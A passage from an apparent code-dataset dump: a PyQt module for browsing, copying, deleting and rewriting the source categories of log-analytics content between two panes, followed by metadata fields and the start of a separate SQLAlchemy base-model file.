self.json_text = self.json_text + json.dumps(result['payload'], indent=4, sort_keys=True) + '\n\n'
else:
self.mainwindow.threadpool.clear()
logger.info(f"ERROR: {result['exception']} on line: {result['line_number']}")
self.mainwindow.errorbox('Something went wrong:\n\n' + result['exception'])
if self.num_successful_threads == self.num_threads:
self.json_window = ShowTextDialog('JSON', self.json_text, self.mainwindow.basedir)
self.json_window.show()
@exception_and_error_handling
def create_folder(self, list_widget, adapter):
if list_widget.updated:
message = '''
Please enter the name of the folder you wish to create:
'''
text, result = QtWidgets.QInputDialog.getText(self, 'Create Folder...', message)
if result:
for item in list_widget.selectedItems():
if item.details['name'] == str(text):
self.mainwindow.errorbox('That Directory Name Already Exists!')
return False
logger.debug(f"[{self.tab_name}] Creating New Folder {str(text)}")
params = {'mode': list_widget.mode}
result = adapter.create_folder(str(text), list_widget, params=params)
if result:
self.update_item_list(list_widget, adapter)
return True
else:
return False
@exception_and_error_handling
def double_clicked_item(self, list_widget, adapter, item, path_label=None):
logger.debug(f"[{self.tab_name}] Going Down One Folder {str(item.details['name'])}")
mode_param = {'mode': list_widget.mode}
merged_params = {**list_widget.params, **mode_param}
result = adapter.down(item.details['name'], params=merged_params)
if result:
self.update_item_list(list_widget, adapter, path_label=path_label)
@exception_and_error_handling
def go_to_parent_dir(self, list_widget, adapter, path_label=None):
if list_widget.updated:
mode_param = {'mode': list_widget.mode}
merged_params = {**list_widget.params, **mode_param}
result = adapter.up(params=merged_params)
if result:
logger.debug(f"[{self.tab_name}] Going Up One folder")
self.update_item_list(list_widget, adapter, path_label=path_label)
class StandardTab(BaseTab):
def __init__(self, mainwindow, copy_override=False):
super(StandardTab, self).__init__(mainwindow)
standard_tab_ui = os.path.join(self.mainwindow.basedir, 'data/standard_tab.ui')
uic.loadUi(standard_tab_ui, self)
self.listWidgetLeft.filter = self.lineEditSearchLeft
self.listWidgetRight.filter = self.lineEditSearchRight
self.pushButtonUpdateLeft.clicked.connect(lambda: self.update_item_list(
self.listWidgetLeft,
self.left_adapter,
path_label=self.labelPathLeft
))
self.pushButtonUpdateRight.clicked.connect(lambda: self.update_item_list(
self.listWidgetRight,
self.right_adapter,
path_label=self.labelPathRight
))
self.pushButtonParentDirLeft.clicked.connect(lambda: self.go_to_parent_dir(
self.listWidgetLeft,
self.left_adapter,
path_label=self.labelPathLeft
))
self.pushButtonParentDirRight.clicked.connect(lambda: self.go_to_parent_dir(
self.listWidgetRight,
self.right_adapter,
path_label=self.labelPathRight
))
self.lineEditSearchLeft.textChanged.connect(lambda: self.set_listwidget_filter(
self.listWidgetLeft,
self.lineEditSearchLeft.text()
))
self.lineEditSearchRight.textChanged.connect(lambda: self.set_listwidget_filter(
self.listWidgetRight,
self.lineEditSearchRight.text()
))
self.listWidgetLeft.itemDoubleClicked.connect(lambda item: self.double_clicked_item(
self.listWidgetLeft,
self.left_adapter,
item,
path_label=self.labelPathLeft
))
self.listWidgetRight.itemDoubleClicked.connect(lambda item: self.double_clicked_item(
self.listWidgetRight,
self.right_adapter,
item,
path_label=self.labelPathRight
))
self.pushButtonNewFolderLeft.clicked.connect(lambda: self.create_folder(
self.listWidgetLeft,
self.left_adapter
))
self.pushButtonNewFolderRight.clicked.connect(lambda: self.create_folder(
self.listWidgetRight,
self.right_adapter
))
self.pushButtonDeleteLeft.clicked.connect(lambda: self.delete_item(
self.listWidgetLeft,
self.left_adapter
))
self.pushButtonDeleteRight.clicked.connect(lambda: self.delete_item(
self.listWidgetRight,
self.right_adapter
))
if not copy_override:
self.pushButtonCopyLeftToRight.clicked.connect(lambda: self.begin_copy_content(
self.listWidgetLeft,
self.listWidgetRight,
self.left_adapter,
self.right_adapter,
{'replace_source_categories': False}
))
self.pushButtonCopyRightToLeft.clicked.connect(lambda: self.begin_copy_content(
self.listWidgetRight,
self.listWidgetLeft,
self.right_adapter,
self.left_adapter,
{'replace_source_categories': False}
))
self.pushButtonJSONLeft.clicked.connect(lambda: self.view_json(
self.listWidgetLeft,
self.left_adapter
))
self.pushButtonJSONRight.clicked.connect(lambda: self.view_json(
self.listWidgetRight,
self.right_adapter
))
def clear_filters(self, list_widget):
list_widget.filter.clear()
def reset_stateful_objects(self, side='both'):
super(StandardTab, self).reset_stateful_objects(side=side)
if self.left:
self.listWidgetLeft.clear()
self.listWidgetLeft.currentcontent = {}
self.listWidgetLeft.updated = False
self.listWidgetLeft.mode = None
self.labelPathLeft.clear()
self.lineEditSearchLeft.clear()
if self.left_creds['service'] == "FILESYSTEM:":
self.pushButtonParentDirLeft.setEnabled(True)
self.pushButtonNewFolderLeft.setEnabled(True)
self.left_adapter = FilesystemAdapter(self.left_creds, 'left', self.mainwindow)
elif ':' not in self.left_creds['service']:
self.pushButtonParentDirLeft.setEnabled(False)
self.pushButtonNewFolderLeft.setEnabled(False)
if self.right:
self.listWidgetRight.clear()
self.listWidgetRight.currentcontent = {}
self.listWidgetRight.updated = False
self.listWidgetRight.mode = None
self.labelPathRight.clear()
self.lineEditSearchRight.clear()
if self.right_creds['service'] == "FILESYSTEM:":
self.pushButtonParentDirRight.setEnabled(True)
self.pushButtonNewFolderRight.setEnabled(True)
self.right_adapter = FilesystemAdapter(self.right_creds, 'right', self.mainwindow)
            elif ':' not in self.right_creds['service']:
self.pushButtonParentDirRight.setEnabled(False)
self.pushButtonNewFolderRight.setEnabled(False)
| from qtpy import QtCore, QtGui, QtWidgets, uic
from modules.multithreading import Worker, ProgressDialog
from modules.shared import ShowTextDialog, exception_and_error_handling
from modules.filesystem_adapter import FilesystemAdapter
import pathlib
import json
import re
import os
from logzero import logger
class_name = 'baseTab'
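# FindReplaceCopyDialog is shown while copying content: it builds one
# checkbox / label / combobox row per source category found in the exported
# queries so the user can choose a replacement category for each one.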
class FindReplaceCopyDialog(QtWidgets.QDialog):
def __init__(self, fromcategories, tocategories, parent=None):
super(FindReplaceCopyDialog, self).__init__(parent)
self.objectlist = []
self.setup_ui(self, fromcategories, tocategories)
def setup_ui(self, Dialog, fromcategories, tocategories):
# setup static elements
Dialog.setObjectName("FindReplaceCopy")
Dialog.setMinimumWidth(700)
Dialog.setWindowTitle('Dynamically Replace Source Category Strings')
QBtn = QtWidgets.QDialogButtonBox.Ok | QtWidgets.QDialogButtonBox.Cancel
self.buttonBox = QtWidgets.QDialogButtonBox(QBtn)
self.buttonBox.accepted.connect(self.accept)
self.buttonBox.rejected.connect(self.reject)
# set up the list of destination categories to populate into the comboboxes
itemmodel = QtGui.QStandardItemModel()
for tocategory in tocategories:
text_item = QtGui.QStandardItem(str(tocategory))
itemmodel.appendRow(text_item)
itemmodel.sort(0)
self.layoutSelections = QtWidgets.QGridLayout()
self.labelReplace = QtWidgets.QLabel()
self.labelReplace.setText("Replace")
self.layoutSelections.addWidget(self.labelReplace, 0, 0)
self.labelOriginal = QtWidgets.QLabel()
self.labelOriginal.setText("Original Source Category")
self.layoutSelections.addWidget(self.labelOriginal, 0, 1)
self.labelReplaceWith = QtWidgets.QLabel()
self.labelReplaceWith.setText("With:")
self.layoutSelections.addWidget(self.labelReplaceWith, 0, 2)
        # Create one set of (checkbox, label, combobox) per fromcategory
for index, fromcategory in enumerate(fromcategories):
objectdict = {'checkbox': None, 'label': None, 'combobox': None}
objectdict['checkbox'] = QtWidgets.QCheckBox()
objectdict['checkbox'].setObjectName("checkBox" + str(index))
objectdict['checkbox'].setSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Fixed)
self.layoutSelections.addWidget(objectdict['checkbox'], index + 1, 0)
            objectdict['label'] = QtWidgets.QLabel()
            objectdict['label'].setObjectName("label" + str(index))
objectdict['label'].setText(fromcategory)
objectdict['label'].setSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Fixed)
self.layoutSelections.addWidget(objectdict['label'], index + 1, 1)
objectdict['combobox'] = QtWidgets.QComboBox()
objectdict['combobox'].setObjectName("comboBox" + str(index))
objectdict['combobox'].setModel(itemmodel)
objectdict['combobox'].setEditable(True)
objectdict['combobox'].setSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Fixed)
self.layoutSelections.addWidget(objectdict['combobox'], index + 1, 2)
self.objectlist.append(objectdict)
self.groupBox = QtWidgets.QGroupBox()
self.groupBox.setLayout(self.layoutSelections)
        # Create a vertical scroll area with a grid layout inside, with label headers
self.scrollArea = QtWidgets.QScrollArea()
self.scrollArea.setWidget(self.groupBox)
self.scrollArea.setWidgetResizable(True)
#self.scrollArea.setFixedHeight(400)
self.scrollArea.setMaximumHeight(500)
self.scrollArea.setMinimumWidth(700)
self.layout = QtWidgets.QVBoxLayout()
self.layout.addWidget(self.scrollArea)
self.layout.addWidget(self.buttonBox)
self.setLayout(self.layout)
def getresults(self):
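        # Return a list of {'from': original category, 'to': replacement}
        # dicts, one entry for every row whose checkbox is ticked.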
results = []
        for entry in self.objectlist:
            # Qt.Checked is the "fully checked" state (raw value 2)
            if entry['checkbox'].checkState() == QtCore.Qt.Checked:
                objectdata = {'from': str(entry['label'].text()), 'to': str(entry['combobox'].currentText())}
                results.append(objectdata)
return results
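# BaseTab implements the behaviour shared by the content tabs: listing items
# through an adapter, copying content (threaded export -> optional metadata
# rewrite -> threaded import), deleting items, creating folders and viewing
# raw JSON. StandardTab below binds these methods to the two-pane widgets
# loaded from standard_tab.ui.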
class BaseTab(QtWidgets.QWidget):
def __init__(self, mainwindow):
super(BaseTab, self).__init__()
self.mainwindow = mainwindow
self.tab_name = 'Base'
self.cred_usage = 'both'
# Override the font
self.font = "Waree"
self.font_size = 12
# things needed for multithreading
self.workers = []
self.num_successful_threads = 0
self.load_icons()
def reset_stateful_objects(self, side='both'):
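        # Remember which pane(s) are being reset and refresh the cached
        # credentials for both sides; subclasses extend this to clear their
        # own widgets.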
self.left = None
self.right = None
if side == 'both':
self.left = True
self.right = True
if side == 'left':
self.left = True
self.right = False
if side == 'right':
self.left = False
self.right = True
self.left_creds = self.mainwindow.get_current_creds('left')
self.right_creds = self.mainwindow.get_current_creds('right')
def load_icons(self):
self.icons = {}
icon_path = str(pathlib.Path(self.mainwindow.basedir + '/data/folder.svg'))
self.icons['Folder'] = QtGui.QIcon(icon_path)
def set_listwidget_filter(self, list_widget, filter_text):
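        # Hide every row that does not contain the filter text; an empty
        # filter shows all rows again.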
for row in range(list_widget.count()):
item = list_widget.item(row)
if filter_text:
                item.setHidden(filter_text not in item.text())
else:
item.setHidden(False)
# Thanks Stackoverflow. Yoink!
def find_keys(self, obj, key):
"""Pull all values of specified key from nested JSON."""
arr = []
def extract(obj, arr, key):
"""Recursively search for values of key in JSON tree."""
if isinstance(obj, dict):
for k, v in obj.items():
if isinstance(v, (dict, list)):
extract(v, arr, key)
elif k == key:
arr.append(v)
elif isinstance(obj, list):
for item in obj:
extract(item, arr, key)
return arr
results = extract(obj, arr, key)
return results
def _find_replace_specific_key_and_value(self, obj, key, old_value, new_value):
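        # Recursively walk the nested structure and replace old_value with
        # new_value wherever it is stored under the given key.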
if isinstance(obj, dict):
for k, v in obj.items():
if isinstance(v, (dict, list)):
obj[k] = self._find_replace_specific_key_and_value(v, key, old_value, new_value)
elif k == key and v == old_value:
obj[k] = new_value
elif isinstance(obj, list):
for index, item in enumerate(obj):
obj[index] = self._find_replace_specific_key_and_value(item, key, old_value, new_value)
return obj
def recurse_replace_query_strings(self, query_string_replacement_list, exported_json):
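        # Apply each from/to replacement to the query strings of an exported
        # item. Handling depends on the sync-definition type: saved searches
        # carry a single queryText, classic dashboards hold metrics and log
        # panels, V2 dashboards keep a list of queries per panel, and folders
        # are processed by recursing into their children.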
if exported_json['type'] == "SavedSearchWithScheduleSyncDefinition":
for query_string_replacement in query_string_replacement_list:
if query_string_replacement['from'] in exported_json['search']['queryText']:
exported_json['search']['queryText'] = exported_json['search']['queryText'].replace(
str(query_string_replacement['from']),
str(query_string_replacement['to']))
break
return exported_json
elif exported_json['type'] == "DashboardSyncDefinition":
for panelnum, panel in enumerate(exported_json['panels'], start=0):
if panel['viewerType'] == "metrics": # there can be multiple query strings so we have an extra loop here
for querynum, metrics_query in enumerate(panel['metricsQueries'], start=0):
for query_string_replacement in query_string_replacement_list:
if query_string_replacement['from'] in metrics_query['query']:
metrics_query['query'] = metrics_query['query'].replace(
str(query_string_replacement['from']),
str(query_string_replacement['to']))
break
panel['metricsQueries'][querynum] = metrics_query
else: # if panel is a log panel
for query_string_replacement in query_string_replacement_list:
if query_string_replacement['from'] in panel['queryString']:
panel['queryString'] = panel['queryString'].replace(
str(query_string_replacement['from']),
str(query_string_replacement['to']))
break
exported_json['panels'][panelnum] = panel
return exported_json
elif exported_json['type'] == "DashboardV2SyncDefinition": # if it's a new style dashboard
for panelnum, panel in enumerate(exported_json['panels'], start=0):
for querynum, query in enumerate(panel['queries']):
for query_string_replacement in query_string_replacement_list:
if query_string_replacement['from'] in query['queryString']:
query['queryString'] = query['queryString'].replace(
str(query_string_replacement['from']),
str(query_string_replacement['to']))
break
panel['queries'][querynum] = query
exported_json['panels'][panelnum] = panel
return exported_json
elif exported_json['type'] == "FolderSyncDefinition":
children = []
            for child in exported_json['children']:
                children.append(self.recurse_replace_query_strings(query_string_replacement_list, child))
exported_json['children'] = children
return exported_json
def clear_filters(self, list_widget):
pass
@exception_and_error_handling
def update_item_list(self, list_widget, adapter, path_label=None):
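        # Ask the adapter for a fresh listing (forwarding the widget's mode
        # and params), rebuild the list widget and clear any active filter.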
mode_param = {'mode': list_widget.mode}
merged_params = {**list_widget.params, **mode_param}
contents = adapter.list(params=merged_params)
logger.debug(f'[Tab Base Class] Updating item list, got: {contents}')
self.update_list_widget(list_widget, adapter, contents, path_label=path_label)
self.clear_filters(list_widget)
def create_list_widget_item(self, item):
item_name = str(item['name'])
if ('contentType' in item) and (item['contentType'] == 'Folder'):
list_item = QtWidgets.QListWidgetItem(self.icons['Folder'], item_name)
elif ('itemType' in item) and (item['itemType'] == 'Folder'):
list_item = QtWidgets.QListWidgetItem(self.icons['Folder'], item_name)
else:
list_item = QtWidgets.QListWidgetItem(item_name)
return list_item
def update_list_widget(self, list_widget, adapter, payload, path_label=None):
try:
list_widget.clear()
count = 0
for item in payload:
list_item = self.create_list_widget_item(item)
# attach the details about the item to the entry in listwidget, this makes life much easier
list_item.details = item
list_widget.addItem(list_item) # populate the list widget in the GUI with no icon (fallthrough)
count += 1
if path_label:
path_label.setText(adapter.get_current_path())
list_widget.updated = True
except Exception as e:
list_widget.clear()
list_widget.updated = False
logger.exception(e)
return
@exception_and_error_handling
def find_replace_metadata(self, adapter, payload):
logger.debug(f"[{self.tab_name}] Replacing Metadata")
source_metadata = []
for item in payload:
# find all the keys in our item that contain queries
query_list = self.find_keys(item, 'queryText')
query_list = query_list + self.find_keys(item, 'query')
query_list = query_list + self.find_keys(item, 'queryString')
# extract the source category from our list of queries
for query in query_list:
source_metadata = source_metadata + re.findall(r'_sourceCategory\s*=\s*\\?\"?([^\s^")]*)\"?',
query)
# de-duplicate the list of source categories
unique_source_metadata = list(set(source_metadata))
# if the destination is a Sumo Instance then query for available metadata tags
if adapter.is_sumo_adapter():
fromtime = str(QtCore.QDateTime.currentDateTime().addSecs(-3600).toString(QtCore.Qt.ISODate))
totime = str(QtCore.QDateTime.currentDateTime().toString(QtCore.Qt.ISODate))
# We query the destination org to get a sample of active source categories
query = r'* | count by _sourceCategory | fields _sourceCategory'
results = adapter.sumo_search_records(query, from_time=fromtime, to_time=totime,
timezone='UTC', by_receipt_time=False)
records = results['payload']
destination_metadata = []
for record in records:
logger.debug(f'Found Source Category:{record}')
destination_metadata.append(record['map']['_sourcecategory'])
unique_destination_metadata = list(set(destination_metadata))
# if the destination is not a Sumo instance then leave the destination metadata tag list empty
else:
unique_destination_metadata = []
dialog = FindReplaceCopyDialog(unique_source_metadata, unique_destination_metadata)
dialog.exec()
dialog.show()
        if dialog.result() == QtWidgets.QDialog.Accepted:
replacelist = dialog.getresults()
logger.debug(f'Metadata replacement list: {replacelist}')
dialog.close()
if len(replacelist) > 0:
new_payload = []
for item in payload:
new_payload.append(self.recurse_replace_query_strings(replacelist, item))
else:
new_payload = payload
return new_payload
else:
return []
@exception_and_error_handling
def begin_copy_content(self,
source_list_widget,
destination_list_widget,
source_adapter,
destination_adapter,
params):
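        # Phase 1 of a copy: start one export worker per selected item. The
        # results are gathered by merge_begin_copy_results, which then starts
        # the import workers for phase 2.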
selected_items = source_list_widget.selectedItems()
num_selected_items = len(selected_items)
if num_selected_items < 1: return # make sure something was selected
logger.debug(f"[{self.tab_name}] Exporting Item(s) {selected_items}")
self.num_threads = num_selected_items
self.num_successful_threads = 0
self.copy_export_results = []
self.export_progress = ProgressDialog('Exporting items...', 0, self.num_threads, self.mainwindow.threadpool, self.mainwindow)
self.workers = []
base_params = {'destination_list_widget': destination_list_widget,
'destination_adapter': destination_adapter,
'read_mode': source_list_widget.mode,
'write_mode': destination_list_widget.mode}
merged_params = {**base_params, **params}
merged_params = {**merged_params, **source_list_widget.params}
for index, selected_item in enumerate(selected_items):
if 'id' in selected_item.details:
item_id = selected_item.details['id']
else:
item_id = None
logger.debug(f"Creating copy thread for item {selected_item.details['name']}")
self.workers.append(Worker(source_adapter.export_item,
selected_item.details['name'],
item_id,
params=merged_params
))
self.workers[index].signals.finished.connect(self.export_progress.increment)
self.workers[index].signals.result.connect(self.merge_begin_copy_results)
self.mainwindow.threadpool.start(self.workers[index])
return
def merge_begin_copy_results(self, result):
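        # Collect each export result; once every export worker has finished
        # successfully, optionally run the source-category replacement dialog
        # and start one import worker per exported item.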
if result['status'] == 'SUCCESS':
self.num_successful_threads += 1
self.copy_export_results.append(result['payload'])
else:
self.mainwindow.threadpool.clear()
            logger.error(f"ERROR: {result['exception']} on line: {result['line_number']}")
self.mainwindow.errorbox('Something went wrong:\n\n' + result['exception'])
if self.num_successful_threads == self.num_threads:
if result['params']['replace_source_categories']:
item_list = self.find_replace_metadata(result['params']['destination_adapter'], self.copy_export_results)
else:
item_list = self.copy_export_results
if len(item_list) == 0: return
logger.debug(f"[{self.tab_name}] Importing Item(s)")
self.num_threads = len(item_list)
self.num_successful_threads = 0
self.copy_export_results = []
self.import_progress = ProgressDialog('Importing items...', 0, self.num_threads, self.mainwindow.threadpool,
self.mainwindow)
self.workers = []
for index, item in enumerate(item_list):
if 'name' in item:
logger.debug(f"Creating copy thread for item {item['name']}")
self.workers.append(Worker(result['params']['destination_adapter'].import_item,
item['name'],
item,
params=result['params']
))
self.workers[index].signals.finished.connect(self.import_progress.increment)
self.workers[index].signals.result.connect(self.merge_results_update_target)
self.mainwindow.threadpool.start(self.workers[index])
def merge_results_update_target(self, result):
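        # Once the last import/delete worker has finished, refresh the
        # destination list widget.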
if result['status'] == 'SUCCESS':
self.num_successful_threads += 1
else:
self.mainwindow.threadpool.clear()
            logger.error(f"ERROR: {result['exception']} on line: {result['line_number']}")
self.mainwindow.errorbox('Something went wrong:\n\n' + result['exception'])
if self.num_successful_threads == self.num_threads:
self.update_item_list(result['params']['destination_list_widget'], result['adapter'])
@exception_and_error_handling
def delete_item(self, list_widget, adapter):
selected_items = list_widget.selectedItems()
if len(selected_items) < 1: return # make sure something was selected
logger.debug(f"[{self.tab_name}] Deleting Item(s) {selected_items}")
message = "You are about to delete the following item(s):\n\n"
for selected_item in selected_items:
message = message + str(selected_item.text()) + "\n"
message = message + '''
This is exceedingly DANGEROUS!!!!
Please be VERY, VERY, VERY sure you want to do this!
You could lose quite a bit of work if you delete the wrong thing(s).
If you are absolutely sure, type "DELETE" in the box below.
'''
text, result = QtWidgets.QInputDialog.getText(self, 'Warning!!', message)
        if result and str(text) == 'DELETE':
self.num_threads = len(selected_items)
self.num_successful_threads = 0
self.progress = ProgressDialog('Deleting items...', 0, self.num_threads, self.mainwindow.threadpool,
self.mainwindow)
self.workers = []
params = {'destination_list_widget': list_widget,
'destination_adapter': adapter,
'mode': list_widget.mode}
for index, selected_item in enumerate(selected_items):
item_name = selected_item.details['name']
if 'id' in selected_item.details:
item_id = selected_item.details['id']
else:
item_id = None
logger.debug(f"Creating delete thread for item {item_name}")
self.workers.append(Worker(adapter.delete,
item_name,
item_id,
params=params))
self.workers[index].signals.finished.connect(self.progress.increment)
self.workers[index].signals.result.connect(self.merge_results_update_target)
self.mainwindow.threadpool.start(self.workers[index])
@exception_and_error_handling
def view_json(self, list_widget, adapter):
selected_items = list_widget.selectedItems()
if len(selected_items) < 1: return # make sure something was selected
logger.debug(f"[Content] Viewing JSON {selected_items}")
self.num_threads = len(selected_items)
self.num_successful_threads = 0
self.progress = ProgressDialog('Viewing items...', 0, self.num_threads, self.mainwindow.threadpool, self.mainwindow)
self.json_text = ''
self.workers = []
params = {'read_mode': list_widget.mode,
'list_widget': list_widget}
for index, selected_item in enumerate(selected_items):
item_name = selected_item.details['name']
if 'id' in selected_item.details:
item_id = selected_item.details['id']
else:
item_id = None
logger.debug(f"Creating view thread for item {item_name}")
self.workers.append(Worker(adapter.get,
item_name,
item_id,
params=params))
self.workers[index].signals.finished.connect(self.progress.increment)
self.workers[index].signals.result.connect(self.merge_view_json_results)
self.mainwindow.threadpool.start(self.workers[index])
def merge_view_json_results(self, result):
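        # Accumulate the pretty-printed JSON of every selected item and show
        # it in a single dialog once all workers have finished.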
if result['status'] == 'SUCCESS':
self.num_successful_threads += 1
self.json_text = self.json_text + json.dumps(result['payload'], indent=4, sort_keys=True) + '\n\n'
else:
self.mainwindow.threadpool.clear()
            logger.error(f"ERROR: {result['exception']} on line: {result['line_number']}")
self.mainwindow.errorbox('Something went wrong:\n\n' + result['exception'])
if self.num_successful_threads == self.num_threads:
self.json_window = ShowTextDialog('JSON', self.json_text, self.mainwindow.basedir)
self.json_window.show()
@exception_and_error_handling
def create_folder(self, list_widget, adapter):
if list_widget.updated:
message = '''
Please enter the name of the folder you wish to create:
'''
text, result = QtWidgets.QInputDialog.getText(self, 'Create Folder...', message)
if result:
for item in list_widget.selectedItems():
if item.details['name'] == str(text):
self.mainwindow.errorbox('That Directory Name Already Exists!')
return False
logger.debug(f"[{self.tab_name}] Creating New Folder {str(text)}")
params = {'mode': list_widget.mode}
result = adapter.create_folder(str(text), list_widget, params=params)
if result:
self.update_item_list(list_widget, adapter)
return True
else:
return False
@exception_and_error_handling
def double_clicked_item(self, list_widget, adapter, item, path_label=None):
logger.debug(f"[{self.tab_name}] Going Down One Folder {str(item.details['name'])}")
mode_param = {'mode': list_widget.mode}
merged_params = {**list_widget.params, **mode_param}
result = adapter.down(item.details['name'], params=merged_params)
if result:
self.update_item_list(list_widget, adapter, path_label=path_label)
@exception_and_error_handling
def go_to_parent_dir(self, list_widget, adapter, path_label=None):
if list_widget.updated:
mode_param = {'mode': list_widget.mode}
merged_params = {**list_widget.params, **mode_param}
result = adapter.up(params=merged_params)
if result:
logger.debug(f"[{self.tab_name}] Going Up One folder")
self.update_item_list(list_widget, adapter, path_label=path_label)
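# StandardTab is the concrete two-pane tab: it loads data/standard_tab.ui,
# wires both panes' buttons, search boxes and list widgets to the BaseTab
# methods above, and swaps in a FilesystemAdapter whenever a pane uses
# "FILESYSTEM:" credentials.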
class StandardTab(BaseTab):
def __init__(self, mainwindow, copy_override=False):
super(StandardTab, self).__init__(mainwindow)
standard_tab_ui = os.path.join(self.mainwindow.basedir, 'data/standard_tab.ui')
uic.loadUi(standard_tab_ui, self)
self.listWidgetLeft.filter = self.lineEditSearchLeft
self.listWidgetRight.filter = self.lineEditSearchRight
self.pushButtonUpdateLeft.clicked.connect(lambda: self.update_item_list(
self.listWidgetLeft,
self.left_adapter,
path_label=self.labelPathLeft
))
self.pushButtonUpdateRight.clicked.connect(lambda: self.update_item_list(
self.listWidgetRight,
self.right_adapter,
path_label=self.labelPathRight
))
self.pushButtonParentDirLeft.clicked.connect(lambda: self.go_to_parent_dir(
self.listWidgetLeft,
self.left_adapter,
path_label=self.labelPathLeft
))
self.pushButtonParentDirRight.clicked.connect(lambda: self.go_to_parent_dir(
self.listWidgetRight,
self.right_adapter,
path_label=self.labelPathRight
))
self.lineEditSearchLeft.textChanged.connect(lambda: self.set_listwidget_filter(
self.listWidgetLeft,
self.lineEditSearchLeft.text()
))
self.lineEditSearchRight.textChanged.connect(lambda: self.set_listwidget_filter(
self.listWidgetRight,
self.lineEditSearchRight.text()
))
self.listWidgetLeft.itemDoubleClicked.connect(lambda item: self.double_clicked_item(
self.listWidgetLeft,
self.left_adapter,
item,
path_label=self.labelPathLeft
))
self.listWidgetRight.itemDoubleClicked.connect(lambda item: self.double_clicked_item(
self.listWidgetRight,
self.right_adapter,
item,
path_label=self.labelPathRight
))
self.pushButtonNewFolderLeft.clicked.connect(lambda: self.create_folder(
self.listWidgetLeft,
self.left_adapter
))
self.pushButtonNewFolderRight.clicked.connect(lambda: self.create_folder(
self.listWidgetRight,
self.right_adapter
))
self.pushButtonDeleteLeft.clicked.connect(lambda: self.delete_item(
self.listWidgetLeft,
self.left_adapter
))
self.pushButtonDeleteRight.clicked.connect(lambda: self.delete_item(
self.listWidgetRight,
self.right_adapter
))
if not copy_override:
self.pushButtonCopyLeftToRight.clicked.connect(lambda: self.begin_copy_content(
self.listWidgetLeft,
self.listWidgetRight,
self.left_adapter,
self.right_adapter,
{'replace_source_categories': False}
))
self.pushButtonCopyRightToLeft.clicked.connect(lambda: self.begin_copy_content(
self.listWidgetRight,
self.listWidgetLeft,
self.right_adapter,
self.left_adapter,
{'replace_source_categories': False}
))
self.pushButtonJSONLeft.clicked.connect(lambda: self.view_json(
self.listWidgetLeft,
self.left_adapter
))
self.pushButtonJSONRight.clicked.connect(lambda: self.view_json(
self.listWidgetRight,
self.right_adapter
))
def clear_filters(self, list_widget):
list_widget.filter.clear()
def reset_stateful_objects(self, side='both'):
super(StandardTab, self).reset_stateful_objects(side=side)
if self.left:
self.listWidgetLeft.clear()
self.listWidgetLeft.currentcontent = {}
self.listWidgetLeft.updated = False
self.listWidgetLeft.mode = None
self.labelPathLeft.clear()
self.lineEditSearchLeft.clear()
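            # "FILESYSTEM:" credentials point this pane at the local filesystem,
            # so a FilesystemAdapter is swapped in and the folder-navigation
            # buttons are enabled; a service string without a ':' disables them.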
if self.left_creds['service'] == "FILESYSTEM:":
self.pushButtonParentDirLeft.setEnabled(True)
self.pushButtonNewFolderLeft.setEnabled(True)
self.left_adapter = FilesystemAdapter(self.left_creds, 'left', self.mainwindow)
elif ':' not in self.left_creds['service']:
self.pushButtonParentDirLeft.setEnabled(False)
self.pushButtonNewFolderLeft.setEnabled(False)
if self.right:
self.listWidgetRight.clear()
self.listWidgetRight.currentcontent = {}
self.listWidgetRight.updated = False
self.listWidgetRight.mode = None
self.labelPathRight.clear()
self.lineEditSearchRight.clear()
if self.right_creds['service'] == "FILESYSTEM:":
self.pushButtonParentDirRight.setEnabled(True)
self.pushButtonNewFolderRight.setEnabled(True)
self.right_adapter = FilesystemAdapter(self.right_creds, 'right', self.mainwindow)
            elif ':' not in self.right_creds['service']:
self.pushButtonParentDirRight.setEnabled(False)
self.pushButtonNewFolderRight.setEnabled(False) | en | 0.833776 | # setup static elements # set up the list of destination categories to populate into the comboboxes # Create 1 set of (checkbox, label, combobox per fromcategory # Creata a vertical scroll area with a grid layout inside with label headers #self.scrollArea.setFixedHeight(400) # Override the font # things needed for multithreading # Thanks Stackoverflow. Yoink! Pull all values of specified key from nested JSON. Recursively search for values of key in JSON tree. # there can be multiple query strings so we have an extra loop here # if panel is a log panel # if it's a new style dashboard # attach the details about the item to the entry in listwidget, this makes life much easier # populate the list widget in the GUI with no icon (fallthrough) # find all the keys in our item that contain queries # extract the source category from our list of queries # de-duplicate the list of source categories # if the destination is a Sumo Instance then query for available metadata tags # We query the destination org to get a sample of active source categories # if the destination is not a Sumo instance then leave the destination metadata tag list empty # make sure something was selected # make sure something was selected This is exceedingly DANGEROUS!!!! Please be VERY, VERY, VERY sure you want to do this! You could lose quite a bit of work if you delete the wrong thing(s). If you are absolutely sure, type "DELETE" in the box below. # make sure something was selected Please enter the name of the folder you wish to create: | 2.209332 | 2 |
tracker/app/utils/base_model.py | JelteF/bottor | 4 | 6616716 | <reponame>JelteF/bottor<filename>tracker/app/utils/base_model.py
"""base_model.py - Some things done to spare time.
Extra functionality that is used by all models. It extends db.Model with extra
functions.
"""
from app import db
from app.utils import serialize_sqla
from datetime import datetime
import dateutil.parser
class BaseEntity(object):
__table_args__ = {'sqlite_autoincrement': True}
# Only json items if explicitly defined, and just print id when not
# defined.
jsons = None
json_relationships = None
prints = ('id',)
# Columns that every model needs.
id = db.Column(db.Integer, primary_key=True)
created = db.Column(db.DateTime, default=datetime.now)
modified = db.Column(db.DateTime, default=datetime.now,
onupdate=datetime.now)
def __repr__(self):
"""Used by print to print a model at server side. It uses the prints
attribute from the object to determine what values to print."""
first = True
string = '<%s(' % (type(self).__name__)
for attr in self.prints:
string += (', ' if not first else '') + '"%s"' % (getattr(self,
attr))
first = False
string += ')>'
return string
# Function to
def to_dict(self):
"""Convert a sqlalchemy object instance to a dictionary.
This is needed for json serialization of an object. The jsons attribute
is used to determine what values to serialize (password hashes and such
should not in there).
"""
attrs = {}
set_jsons = False
if not self.jsons:
self.jsons = (column.name for column in self.__table__.columns)
set_jsons = True
for column in self.jsons:
value = serialize_sqla(getattr(self, column))
attrs[column] = value
if self.json_relationships:
for rel in self.json_relationships:
attrs[rel] = serialize_sqla(getattr(self, rel).all())
if set_jsons:
self.jsons = None
return attrs
@classmethod
def merge_dict(cls, obj, relationships={}):
"""Merge dictionary as object."""
# Get the correct entry from the database.
if 'id' in obj and obj['id']:
entry = cls.by_id(obj['id'])
if not entry:
return None
# If the dict doesn't contain id it means the entry does not exist yet.
else:
entry = cls()
# Remove id, created and modified, since those are things you want to
# automaticaly update.
obj.pop('id', None)
